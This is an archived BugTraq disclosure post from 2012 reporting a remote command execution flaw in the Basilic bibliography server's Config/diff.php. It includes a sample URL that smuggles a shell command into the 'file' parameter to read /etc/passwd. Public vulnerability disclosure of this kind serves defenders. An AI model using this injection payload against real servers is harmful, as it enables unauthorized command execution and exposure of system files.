BugTraq
Basilic RCE bug Jun 30 2012 08:45PM
m razavi777 gmail com
Hi
Dear Sir

Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center.
there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server.
sample:
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1
&old=2

Regards
M.Razavi

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus